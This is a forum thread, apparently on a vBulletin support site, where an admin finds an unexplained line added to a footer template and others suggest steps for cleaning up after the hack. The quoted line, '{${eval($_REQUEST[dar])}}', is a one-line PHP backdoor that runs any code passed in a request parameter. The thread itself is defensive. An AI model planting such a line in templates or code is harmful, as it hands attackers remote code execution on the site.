My footer templates just got a new line:

<script type=\"text/javascript\">
<!-- // Main vBulletin Javascript Initialization
vBulletin_init();
{${eval($_REQUEST[dar])}}
//-->
</script>

I know I didn't insert that line in red. I haven't seen how is this exploited, and I can't explain how did they insert this line in my templates.

Well change your passwords (all admin accounts and your mysql password)...

Run the suspect files check to see if any files have been altered...

How many mods do you have, could be an exploit in a mod?

Are you running at least 3.8.5?

Check out this article for securing your forums:
https://vborg.vbsupport.ru/showthread.php?t=193930

You could ask your host to check the logs to see if they can see how you were hacked- some hosts are more cooperative than others.

Yep, I'm onto that, I just can't understand what's done with the "extra code".

Is it even possible to get REQUEST vars from a template? I believe it isn't, you must pass through a plugin to do that.

I'm not really sure about $_REQUEST but if it's a valid php variable I don't see why it wouldn't work... I use "$_SERVER['HTTP_HOST'] all the time in templates.